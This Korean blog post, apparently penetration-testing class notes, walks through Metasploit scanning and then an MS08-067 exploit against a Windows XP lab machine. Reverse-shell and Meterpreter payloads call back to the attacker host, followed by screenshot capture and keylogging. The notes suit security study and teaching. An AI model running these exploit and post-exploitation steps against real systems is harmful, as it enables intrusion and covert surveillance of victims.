정보보안(구버전)/작업중 2016. 1. 24. 11:37
02. Metasploit Tool을 이용한 스캐닝 및 공격
- 정보 수집, 공격(Exploit), 공격에 사용되는 Plugin(payload) 등으로 구성된 도구
- 외부 모듈인 취약점 점검, 포트 스캐너 등의 사용이 가능하고, DB 저장 가능
- 정보 수집 및 공격 모듈 사용시 간편하게 진행 가능
- msfconsole 내에서 외부 명령어 사용(리눅스 명령어) 가능
- 리눅스에서 실행하는 공격 툴 관련 실행 내용들을 Metaploit에서 실행하여 결과를 저장할 수 있음
1. Metasploit DB 연결
# /etc/init.d/postgresql star Postgres SQL 시작
# su postgres DB 관리자 변경
$ createuser msf1 -P DB 계정 생성 및 패스워드 설정(만약, 삭제할 경우 $ dropuser msf1)
passwd : msf1
$ createdb --owner=msf1 msf1_db 사용자 데이터베이스 생성
$ exit 원래 계정으로 나가기
# msfconsole metasploit 콘솔 도구 실행
msf> help metasploit 명령어 도움말
msf> db_status DB 연결 확인
msf> db_connect msf1:패스워드@localhost:5432/msf1_db DB 연결
- 한번 사용한 묘듈은 남아 있기때문에, 다음에 사용할때 빠름
- 만약, 해지할려면, 'db_disconnect' 명령어 사용
msf> db_status
msf> search scanner
msf> use scanner_name
msf> back
msf> exit
[참고] 모듈 Rank 의미
Rank
성공 실패
normal 정보 수집 50 : 50
greas 정보 수집 70 : 30
excellent 정보 수집 90 : 10
2. MSF 에서 외부 명령어와 내부 명령어 차이점
Ex1) 외부 명령어를 사용할 수 있음, 단 DB에 저장안됨
msf > nmap -sS 172.16.4.254 -v
[*] exec: nmap -sS 172.16.4.254 -v
Ex2) msf 내부 nmap 명령어 실행, DB에 저장됨
msf> db_nmap -sS -A -p 8080 172.16.4.254
[*] exec: <--- 안나옴
msf> help
msf > hosts DB에 기록된 목록 확인
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.4.254 Linux server
msf > services DB에 기록된 해당 타켓에 대한 서비스 상태 확인
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.4.254 8080 tcp http-proxy filtered
3. Metasploit 용어
- Exploit : 시스템, 애플리케이션, 서버등의 취약점을 악용하는 방법, SQL Injection, Buffer Overflow 등
- Payload : 시스템에서 실행하고자 하는 코드로 프레임워크에 의해 전달 (Ex : 악성 코드)
- Shell code : 공격 수행시 수행할때 Payload에 사용되는 명령 집합
- Module : Metasploit framework에서 사용되는 소프트웨어의 부분
4. msf를 이용한 스케닝
Ex1) idle scanning
- ISD, IPS를 회피하기 위한 스캐닝 방법
- 현재 전원이 on 시스템 중에 통신(패켓 생성 X)이 없는 시스템을 찾는 스캐닝 기법
- IP 스푸핑까지 같이 적용하여 스캐닝 가능
msf > search scanner 많은 목록이 나옴
msf > search ipidseq 'ipidseq' 목록만 나옴
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ip/ipidseq normal IPID Sequence Scanner
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > help
msf auxiliary(ipidseq) > help show
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface 인터페이스 설정
RHOSTS yes The target address range or CIDR identifier 타켓 서브넷 or IP 주소 설정
RPORT 80 yes The target port 타켓 포트 설정
SNAPLEN 65535 yes The number of bytes to capture 캡처할 데이터 용량(단위 : Byte)
THREADS 1 yes The number of concurrent threads 속도, 번호가 낮으면 느림
TIMEOUT 500 yes The reply read timeout in milliseconds 응답 속도 (낮게 조정 권장)
- no : 설정 해도 않해도됨 (단, 특정 Inteface만 적용할 경우, 설정해야 함. 모든 인터페이스에 적용할 경우, 설정 패스)
- yes : 무조건 설정값이 들어가야함
THREADS : 공격 타켓이 많으면, 값을 높게 조정 권장
- 윈도우 THREADS : 16 (16이상 설정해봤자, 결과값 거의 차이 없음)
- 리눅스 THREADS : 높게 해도 됨
msf auxiliary(ipidseq) > set RHOSTS 172.16.0.0/16 '172.16.0.0/16' 서브넷 스켄
RHOSTS => 172.16.0.0/16
msf auxiliary(ipidseq) > set RPORT 8080 포트 설정
RPORT => 8080
msf auxiliary(ipidseq) > set THREADS 50 쓰레드 설정
THREADS => 50
(삭제할 경우 unset RHOSTS)
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS 172.16.0.0/16 yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SNAPLEN 65535 yes The number of bytes to capture
THREADS 50 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(ipidseq) > run 실행
[*] 172.16.0.1's IPID sequence class : Incremental! 통신 않하고 있는 타켓 (스푸핑할 IP 주소로 선정함)
[*] 172.16.0.50's IPID sequence class : Incremental!
[*] 172.16.0.51's IPID sequence class : Unknown 전원이 off된 타켓
~ 중간 생략 ~
msf auxiliary(ipidseq) > db_nmap -p 8080 -Pn -sI 172.16.0.50 172.16.4.254
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 11:46 KST
[*] Nmap: Idle scan using zombie 172.16.0.50 (172.16.0.50:80); Class: Incremental
[*] Nmap: Nmap scan report for 172.16.4.254
[*] Nmap: Host is up (0.19s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 8080/tcp open http-proxy
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 92.54 seconds
- Pn : 공격자의 실제 IP 주소를 보이지 않게 하기 위해서 사용함
msf auxiliary(ipidseq) > back
msf >
Ex2) Syn scan
- 공격 타켓에 대한 포트 상태 여부를 확인하는 스캐닝 방법
- nmap 처럼 다양한 정보를 스켄할 수 없음
msf > search portscan
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
msf > use scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set PORTS 1-80
PORTS => 1-80
msf auxiliary(syn) > set RHOSTS 172.16.4.254
RHOSTS => 172.16.4.254
msf auxiliary(syn) > set TEREADS 16
TEREADS => 16
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-80 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 172.16.4.254 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > run
msf auxiliary(syn) > back
Ex3) smb block scan
- 윈도우 Net-Bios를 이용하는 스캐닝 방법
msf > search smb_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) >
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > set RHOSTS 172.16.4.0/24
RHOSTS => 172.16.4.0/24
msf auxiliary(smb_version) > set THREADS 16
THREADS => 16
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.4.0/24 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 16 yes The number of concurrent threads
msf auxiliary(smb_version) > run
[*] 172.16.4.11:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.10:445 is running Windows 7 Ultimate SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.12:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.3:445 is running Windows 7 Ultimate SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.18:445 is running Windows 7 Ultimate SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.23:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJWJ-PC) (domain:WORKGROUP)
[*] 172.16.4.22:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 56 of 256 hosts (21% complete)
[*] Scanned 79 of 256 hosts (30% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 207 of 256 hosts (80% complete)
[*] Scanned 240 of 256 hosts (93% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) >
msf auxiliary(smb_version) > back
msf >
Ex4) FTP scan
- FTP 서버 스캐닝 방법
msf > search ftp_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_version normal FTP Version Scanner
msf > use scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(ftp_version) > set RHOSTS 172.16.4.0/24
RHOSTS => 172.16.4.0/24
msf auxiliary(ftp_version) > set THREADS 50
THREADS => 50
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS 172.16.4.0/24 yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 50 yes The number of concurrent threads
msf auxiliary(ftp_version) > run
[*] Scanned 32 of 256 hosts (12% complete)
[*] Scanned 70 of 256 hosts (27% complete)
[*] Scanned 92 of 256 hosts (35% complete)
[*] Scanned 112 of 256 hosts (43% complete)
[*] Scanned 139 of 256 hosts (54% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 200 of 256 hosts (78% complete)
[*] Scanned 214 of 256 hosts (83% complete)
[*] Scanned 243 of 256 hosts (94% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) > back
msf >
5. Exploit Tools
- 취약점 발견 -> 공격 실시
- 공격자 : Kali Linux(192.168.10.134)
- 공격 타켓 : Win XP(192.168.10.135) -> FTP 서버 플레이 버튼 클릭
Ex1) db_nmap 스캐닝 실시
msf > db_nmap -sS -p 1-500ulns 192.168.10.135
msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135
msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135
msf > db_nmap -sS -p 1-500ulns 192.168.10.135
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:29 KST
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:25 KST
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp EasyFTP Server ftpd
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: | drw-rw-rw- 1 user group 0 Jan 24 12:02 . [NSE: writeable]
[*] Nmap: |_drw-rw-rw- 1 user group 0 Jan 24 12:02 .. [NSE: writeable]
[*] Nmap: |_ftp-bounce: no banner
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: | smtp-commands: with-15b28b4cfd Hello [192.168.10.134], SIZE 2097152, PIPELINING, DSN,
ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL
QUIT HELP AUTH BDAT VRFY
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 404)
[*] Nmap: |_http-server-header: Microsoft-IIS/5.1
[*] Nmap: |_http-title: Site Not Found
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
[*] Nmap: 443/tcp open https?
[*] Nmap: | http-cisco-anyconnect:
[*] Nmap: |_ ERROR: Not a Cisco ASA or unsupported version
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE:
cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: | \\192.168.10.135\pipe\sql\query:
[*] Nmap: | Version:
[*] Nmap: | name: Microsoft SQL Server 2000 RTM
[*] Nmap: | number: 8.00.194.00
[*] Nmap: | Product: Microsoft SQL Server 2000
[*] Nmap: | Service pack level: RTM
[*] Nmap: | Post-SP patches applied: false
[*] Nmap: |_ Named pipe: \\192.168.10.135\pipe\sql\query
[*] Nmap: |_nbstat: NetBIOS name: WITH-15B28B4CFD, NetBIOS user: <unknown>, NetBIOS MAC:
00:0c:29:ab:e2:7a (VMware)
[*] Nmap: | smb-os-discovery:
[*] Nmap: | OS: Windows XP (Windows 2000 LAN Manager)
[*] Nmap: | OS CPE: cpe:/o:microsoft:windows_xp::-
[*] Nmap: | Computer name: with-15b28b4cfd
[*] Nmap: | NetBIOS computer name: WITH-15B28B4CFD
[*] Nmap: | Workgroup: WORKGROUP
[*] Nmap: |_ System time: 2016-01-24T14:26:02+09:00
[*] Nmap: | smb-security-mode:
[*] Nmap: | account_used: guest
[*] Nmap: | authentication_level: user
[*] Nmap: | challenge_response: supported
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.42 ms 192.168.10.135
[*] Nmap: OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds
msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:26 KST
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
(취약함, 공격 가능, 윈도우6 이후부터는 공격 안됨)
[*] Nmap: | Conficker: Likely CLEAN
[*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
(취약함)
[*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
(취약함)
Ex2) 공격 모듈 찾기(Payload : windows/shell/reverse_tcp)
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service
Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP
Inline
generic/tight_loop normal Generic x86 Tight Loop
~ 중간 생략 ~
Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse
TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse
TCP Stager (DNS)
windows/shell/reverse_tcp_rc4 normal Windows Command Shell, Reverse
TCP Stager (RC4 Stage Encryption)
windows/shell/reverse_tcp_uuid normal Windows Command Shell, Reverse
TCP Stager with UUID Support
windows/shell_bind_tcp normal
- Payload 상의 Shell은 중간 인터페이스 없이 직접 침투할때 사용함
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
~ 중간 생략 ~
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > set LHOST 192.168.10.134
LHOST => 192.168.10.134
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > set RHOST 192.168.10.135
RHOST => 192.168.10.135
msf exploit(ms08_067_netapi) > set target 47
target => 47
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.10.134 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.10.134:8080
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.10.135
[*] Command shell session 1 opened (192.168.10.134:8080 -> 192.168.10.135:1078) at 2016-01-24
15:19:10 +0900
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ���� ���� ����:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.135
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.2
C:\WINDOWS\system32>
C:\WINDOWS\system32>^C (ctrl+c)
Abort session 1? [y/N] y
[*] 192.168.10.135 - Command shell session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
- 공격 실행시 바로 공격 타켓 시스템의 명령창으로 접속된다.
- BOF 등의 유사 공격으로 접속 된 상태이므로 명령 창 내 버그가 존재하기 때문에 일부 명령어는 사용을 못한다.
Ex3) 공격 모듈 찾기(Payload : meterpreter/reverse_tcp)
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service
Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.10.134 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
set umsf exploit(ms08_067_netapi) > unset PAYLOAD
Unsetting PAYLOAD...
shmsf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
~ 중간 생략 ~
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective
Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.10.134 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.10.134:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.10.135
[*] Meterpreter session 2 opened (192.168.10.134:8080 -> 192.168.10.135:1082) at 2016-01-24 15:49:27 +0900
meterpreter > shell
Process 2488 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter ���� ���� ����:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.135
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.2
C:\WINDOWS\system32>
C:\WINDOWS\system32>^Z (ctrl+z)
Background channel 1? [y/N] y
[-] Error running command shell: ThreadError can't be called from trap context
meterpreter >
Ex4) 타겟 시스템 정보 확인 및 프로세스 확인
meterpreter > sysinfo 타겟 시스템 정보 확인
meterpreter > ps 타겟 시스템에서 실행 중인 프로세스 출력
Ex5) 타겟 시스템 화면 스크린샷
meterpreter > screenshot 타겟 시스템 화면 스크린샷 실시
Screenshot saved to: /root/prTcNwSY.jpeg
- GUI 기반으로 root 홈 디렉토리 스크린샷 확인
Ex6) 타겟 시스템 키-로그
- win xp에서 메모장 열기 실시
meterpreter > ps Win XP 메모장 PID 번호 확인
2944 notepad.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\notepad.exe
meterpreter > migrate 2944 타겟 시스템 키-로그 기능
[*] Migrating from 1072 to 2944...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
- win xp에서 메모장에 문자 입력 실시
안녕하세요 타겟입니다.
Hello Hi
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WITH-15B28B4CFD
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt
[*] Recording keystrokes...
(ctrl+c)
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
root@kali:~# ls -la /root/.msf4/loot
합계 12
drwxr-xr-x 2 root root 4096 1월 24 16:33 .
drwxr-xr-x 8 root root 4096 1월 24 10:01 ..
-rw-r--r-- 1 root root 193 1월 24 16:33 20160124163330_default_192.168.10.135_host.windows.key_308141.txt
root@kali:~# cat /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt
Keystroke log started at 2016-01-24 16:33:30 +0900
dkssu <Back> <Back> <Back> <Back> <Back>
ssudpdy rptt <Back> dlqsl <Return> <Return>
ello <Back> <Back> <Back> <Back> <Back> Ho H
Ex6) 타겟 시스템 프로그램 강제 종료
meterpreter > kill 2944
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.10.135 - Meterpreter session 3 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
'정보보안(구버전) > 작업중' 카테고리의 다른 글
| setoolkit 구버전 디렉토리 (0) | 2016.12.09 |
|---|---|
| 모의 해킹 I - 14. CentOS를 이용한 'snort' IDS (0) | 2016.01.31 |
| 모의 해킹 I - 13. CentOS를 이용한 'iptables' 방화벽 (0) | 2016.01.31 |
| 모의 해킹 I - 01. Information Gathering (0) | 2016.01.24 |
